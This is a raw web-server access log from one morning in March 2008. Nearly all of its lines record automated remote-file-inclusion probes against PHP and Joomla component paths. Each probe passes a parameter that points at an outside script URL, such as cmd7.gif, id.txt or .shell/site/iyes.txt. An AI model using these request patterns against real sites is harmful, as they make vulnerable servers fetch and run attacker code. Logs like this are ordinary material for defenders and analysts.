217.169.46.98 - - [02/Mar/2008:09:22:51 -0800] "GET /logs/access_071219.log/admin/spaw/spaw_control.class.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [02/Mar/2008:09:22:52 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:09:22:52 -0800] "GET /admin/spaw/spaw_control.class.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:22:52 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:09:22:52 -0800] "GET /logs/admin/spaw/spaw_control.class.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:22:53 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
87.230.21.10 - - [02/Mar/2008:09:23:00 -0800] "GET /index.php?pageurl=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.21.10 - - [02/Mar/2008:09:23:01 -0800] "GET /index.php?pageurl=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:23:07 -0800] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:23:09 -0800] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:23:11 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:23:12 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:23:13 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:23:20 -0800] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.188.66.23 - - [02/Mar/2008:09:23:35 -0800] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.camino-books.com/images/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [02/Mar/2008:09:23:36 -0800] "GET /logs/access_071212.log/admin/spaw/spaw_control.class.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
66.7.192.123 - - [02/Mar/2008:09:23:48 -0800] "GET /plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:23:55 -0800] "GET ///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:09:24:03 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
80.249.117.99 - - [02/Mar/2008:09:24:03 -0800] "GET /errors.php?error=http://www.fm24forum.de/update/fissh/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:24:09 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
74.6.23.150 - - [02/Mar/2008:09:24:15 -0800] "GET /tmp/ HTTP/1.0" 200 2164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.226.79.133 - - [02/Mar/2008:09:24:25 -0800] "GET /logs//modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [02/Mar/2008:09:24:26 -0800] "GET //modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:09:24:26 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.71.183.50 - - [02/Mar/2008:09:24:28 -0800] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.46.28.103 - - [02/Mar/2008:09:24:39 -0800] "GET /logs/access_080221.log//gallery/update/de.phphttp://www.19thgreen-bb.com/cache/%20/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.46.28.103 - - [02/Mar/2008:09:24:39 -0800] "GET //gallery/update/de.phphttp://www.19thgreen-bb.com/cache/%20/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.46.28.103 - - [02/Mar/2008:09:24:40 -0800] "GET /logs//gallery/update/de.phphttp://www.19thgreen-bb.com/cache/%20/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:25:02 -0800] "GET /logs/access_080207.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:25:03 -0800] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:25:06 -0800] "GET /logs/access_080207.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:09:25:06 -0800] "GET /logs/access_080119.log//dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:25:06 -0800] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:09:25:06 -0800] "GET //dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.9.176.178 - - [02/Mar/2008:09:25:07 -0800] "GET /logs//dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:25:08 -0800] "GET /logs/access_080207.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:25:08 -0800] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:25:35 -0800] "GET /logs/access_080207.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:25:35 -0800] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:26:03 -0800] "GET /logs/access_080128.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:26:03 -0800] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:09:26:09 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:09:26:09 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:09:26:10 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:09:26:12 -0800] "GET /logs/access_080221.log//admin/classes/TplLoad.php?full_path_to_public_program=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.25.34 - - [02/Mar/2008:09:26:13 -0800] "GET /tmp/?S=A HTTP/1.0" 200 2164 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.185.237.35 - - [02/Mar/2008:09:26:15 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:26:19 -0800] "GET /logs/access_080127.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.185.237.35 - - [02/Mar/2008:09:26:20 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:26:24 -0800] "GET /logs/access_080215.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:26:27 -0800] "GET /logs/access_080127.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:26:32 -0800] "GET /logs/access_080128.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:26:33 -0800] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.7.194 - - [02/Mar/2008:09:26:53 -0800] "GET /logs/access_080215.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//images/data/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.82.34.252 - - [02/Mar/2008:09:27:22 -0800] "GET //index.php?cms=http://h.b-warez.com/bht.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.37.15.210 - - [02/Mar/2008:09:27:25 -0800] "GET //include/inc_ext/spaw/spaw_control.class.php?spaw_root=http://www.emaging.fr/images/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
77.37.15.210 - - [02/Mar/2008:09:27:56 -0800] "GET /logs//include/inc_ext/spaw/spaw_control.class.php?spaw_root=http://www.emaging.fr/images/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
74.6.26.145 - - [02/Mar/2008:09:28:00 -0800] "GET /tmp/sess_273f05d104d0873e7817739dc1f021f6 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:09:28:30 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.160.33.164 - - [02/Mar/2008:09:28:58 -0800] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.33.164 - - [02/Mar/2008:09:28:58 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:09:29:02 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Opera/8.5 (X11; Linux i686; U; cs)" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:09:29:03 -0800] "GET /logs/access_080221.log/components/com_performs/performs.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Opera/8.5 (X11; Linux i686; U; cs)" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:09:29:05 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Opera/8.5 (X11; Linux i686; U; cs)" "www.dmulk.com"
74.6.25.30 - - [02/Mar/2008:09:29:13 -0800] "GET /tmp/sess_944a1ed1cba573a5610a5d0593316678 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.227.96.89 - - [02/Mar/2008:09:29:35 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:09:29:36 -0800] "GET /logs/access_080120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Opera/8.5 (X11; Linux i686; U; cs)" "www.dmulk.com"
212.227.96.89 - - [02/Mar/2008:09:29:36 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:09:29:48 -0800] "GET /logs/access.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:09:29:55 -0800] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:09:29:55 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:09:29:59 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:09:30:06 -0800] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:09:30:06 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:09:30:07 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:09:30:18 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:09:30:29 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.248.62.98 - - [02/Mar/2008:09:30:32 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
213.248.62.98 - - [02/Mar/2008:09:30:32 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:09:30:35 -0800] "GET /logs/access_080119.log//dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:09:30:37 -0800] "GET //dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [02/Mar/2008:09:30:38 -0800] "GET /logs//dormdna.htm/plugins/payment/secpay/config.inc.php?config%5broot_dir%5d=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:09:30:56 -0800] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:09:30:56 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:09:30:56 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:09:30:57 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.144.182 - - [02/Mar/2008:09:30:59 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.25.144.182 - - [02/Mar/2008:09:31:02 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:09:31:07 -0800] "GET /logs/access.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:09:31:11 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:09:31:12 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:09:31:12 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.8 - - [02/Mar/2008:09:31:13 -0800] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://www.formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.8 - - [02/Mar/2008:09:31:13 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://www.formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.234.144.44 - - [02/Mar/2008:09:31:13 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.geocities.com/gary.dalnet/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.8 - - [02/Mar/2008:09:31:14 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://www.formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.112.120 - - [02/Mar/2008:09:32:22 -0800] "GET /logs/access.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/baixaki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.112.120 - - [02/Mar/2008:09:32:22 -0800] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/baixaki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.112.120 - - [02/Mar/2008:09:32:22 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://usuarios.lycos.es/baixaki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.37.15.210 - - [02/Mar/2008:09:32:23 -0800] "GET //include/inc_ext/spaw/spaw_control.class.php?spaw_root=http://www.emaging.fr/images/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
77.37.15.210 - - [02/Mar/2008:09:32:23 -0800] "GET /logs//include/inc_ext/spaw/spaw_control.class.php?spaw_root=http://www.emaging.fr/images/cmd7.gif??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
196.35.158.180 - - [02/Mar/2008:09:32:57 -0800] "GET /logs/access_071231.log/pivot/modules/module_db.php?pivot_path=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:09:33:12 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:09:33:12 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:09:33:13 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.69.222.121 - - [02/Mar/2008:09:33:41 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.107.148.34 - - [02/Mar/2008:09:33:53 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.107.148.34 - - [02/Mar/2008:09:33:53 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.107.148.34 - - [02/Mar/2008:09:33:54 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.82.216 - - [02/Mar/2008:09:33:59 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:09:34:03 -0800] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:09:34:04 -0800] "GET //claroline/tracking/userLog.php?rootSys=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
41.207.177.167 - - [02/Mar/2008:09:34:04 -0800] "GET /logs//claroline/tracking/userLog.php?rootSys=http://216.191.16.13/.tmp/site/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
